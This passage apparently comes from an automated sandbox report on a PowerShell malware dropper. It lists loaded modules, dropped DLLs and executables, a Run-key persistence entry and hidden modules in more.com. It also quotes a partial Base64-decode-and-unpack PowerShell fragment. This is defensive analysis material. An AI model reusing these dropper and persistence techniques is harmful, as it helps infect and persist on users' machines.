                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: ulib.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: fsutilext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: starburn.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: qtcore4.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: qtgui4.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: qtnetwork4.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: qtxml4.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcp100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcp100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcp100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcp100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: dbgcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: pla.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: pdh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: tdh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: wevtapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: shdocvw.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: shdocvw.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: IaslcsMo.ps1Static file information: File size 31179107 > 1048576
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\VWPGdipf\msvcr100.dllJump to behavior
                    Source: Binary string: C:\Users\Mark\code\github\NAudio\NAudio\obj\Release\net35\NAudio.pdb source: powershell.exe, 00000000.00000002.1934473378.0000018E546AE000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000000.00000002.1934473378.0000018E546AE000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Set-up.exe, 00000008.00000002.2146378325.000000006BB51000.00000020.00000001.01000000.00000010.sdmp
                    Source: Binary string: msvcp100.i386.pdb source: Set-up.exe, Set-up.exe, 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp
                    Source: Binary string: dmprocessxmlfiltered.pdbGCTL source: more.com, 00000006.00000002.2100161224.0000000005700000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: Set-up.exe, 00000005.00000002.2016219461.00000000037CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000005.00000002.2016592480.0000000003EDE000.00000004.00000001.00020000.00000000.sdmp, Set-up.exe, 00000005.00000002.2016345332.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, more.com, 00000006.00000002.2099881522.0000000005100000.00000004.00001000.00020000.00000000.sdmp, more.com, 00000006.00000002.2099593586.0000000004C95000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2121445829.0000000003BAF000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2131316446.00000000042BD000.00000004.00000001.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2125975739.0000000003F00000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: Set-up.exe, 00000005.00000002.2016219461.00000000037CA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000005.00000002.2016592480.0000000003EDE000.00000004.00000001.00020000.00000000.sdmp, Set-up.exe, 00000005.00000002.2016345332.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, more.com, 00000006.00000002.2099881522.0000000005100000.00000004.00001000.00020000.00000000.sdmp, more.com, 00000006.00000002.2099593586.0000000004C95000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2121445829.0000000003BAF000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2131316446.00000000042BD000.00000004.00000001.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.2125975739.0000000003F00000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb0 source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: dmprocessxmlfiltered.pdb source: more.com, 00000006.00000002.2100161224.0000000005700000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\Mark\code\github\NAudio\NAudio\obj\Release\net35\NAudio.pdbSHA256do source: powershell.exe, 00000000.00000002.1934473378.0000018E546AE000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb source: Set-up.exe, 00000005.00000000.1930532204.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000005.00000002.2014692853.0000000000864000.00000002.00000001.01000000.00000009.sdmp, Set-up.exe, 00000008.00000000.2018072571.0000000000864000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Release\i386\StarBurn.pdb source: Set-up.exe, 00000005.00000002.2039669387.000000006F031000.00000020.00000001.01000000.0000000A.sdmp, Set-up.exe, 00000008.00000002.2170359070.000000006F031000.00000020.00000001.01000000.0000000A.sdmp

                    Data Obfuscation

                    barindex
                    Found suspicious powershell code related to unpacking or dynamic code loading
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($lkqUsSoM) [System.IO.File]::WriteAllBytes($tqCzfuAI, $siQuxqAO) $kzxTWYQy = New-Item -ItemType Directory -Path $avOQhqfd try { $AAIzCJGc = Expand-Archive -Path $tqCzf
                    Source: NAudio.dll.0.drStatic PE information: 0xCC972473 [Sat Oct 8 12:22:11 2078 UTC]
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BBDB5A7 _encoded_null,LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,5_2_6BBDB5A7
                    Source: QtCore4.dll.0.drStatic PE information: real checksum: 0x283beb should be: 0x289700
                    Source: ffmpeg.dll.0.drStatic PE information: section name: .gxfg
                    Source: ffmpeg.dll.0.drStatic PE information: section name: .retplne
                    Source: ffmpeg.dll.0.drStatic PE information: section name: _RDATA
                    Source: Resource.ct.0.drStatic PE information: section name: .gxfg
                    Source: Resource.ct.0.drStatic PE information: section name: .retplne
                    Source: Resource.ct.0.drStatic PE information: section name: .voltbl
                    Source: Resource.ct.0.drStatic PE information: section name: CPADinfo
                    Source: Resource.ct.0.drStatic PE information: section name: LZMADEC
                    Source: Resource.ct.0.drStatic PE information: section name: _RDATA
                    Source: Resource.ct.0.drStatic PE information: section name: malloc_h
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BB6B658 push ecx; ret 5_2_6BB6B66B
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BB52D88 push eax; ret 5_2_6BB52DA6
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BB60CC5 push ecx; ret 5_2_6BB60CD8
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 8_2_6BC43801 push ecx; ret 8_2_6BC43814
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 8_2_6BC43D95 push ecx; ret 8_2_6BC43DA8
                    Source: StarBurn.dll.0.drStatic PE information: section name: .text entropy: 6.935927781173939
                    Source: msvcr100.dll.0.drStatic PE information: section name: .text entropy: 6.9169969425576285
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\msvcr100.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\StarBurn.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\QtNetwork4.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeFile created: C:\Users\user\AppData\Roaming\UPEC\QtNetwork4.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeFile created: C:\Users\user\AppData\Roaming\UPEC\QtCore4.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\QtXml4.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeFile created: C:\Users\user\AppData\Roaming\UPEC\msvcp100.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\QtCore4.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\UpdateClient.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\QtGui4.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeFile created: C:\Users\user\AppData\Roaming\UPEC\msvcr100.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeFile created: C:\Users\user\AppData\Roaming\UPEC\QtGui4.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeFile created: C:\Users\user\AppData\Roaming\UPEC\StarBurn.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\UpdateCommon.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\RcClientBase.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\NAudio.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeFile created: C:\Users\user\AppData\Roaming\UPEC\QtXml4.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\Data\d3dcompiler_47.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\Data\Updater.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\Resource.ctJump to dropped file
                    Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\wpkoqtsrtJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\msvcp100.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\Data\ffmpeg.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\yhgJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\Resource.ctJump to dropped file
                    Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\wpkoqtsrtJump to dropped file
                    Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\yhgJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetUtilityAppJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetUtilityAppJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Found hidden mapped module (file has been removed from disk)
                    Source: C:\Windows\SysWOW64\more.comModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\WPKOQTSRT
                    Source: C:\Windows\SysWOW64\more.comModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YHG
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BBAA3DD GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,_CxxThrowException,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,5_2_6BBAA3DD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
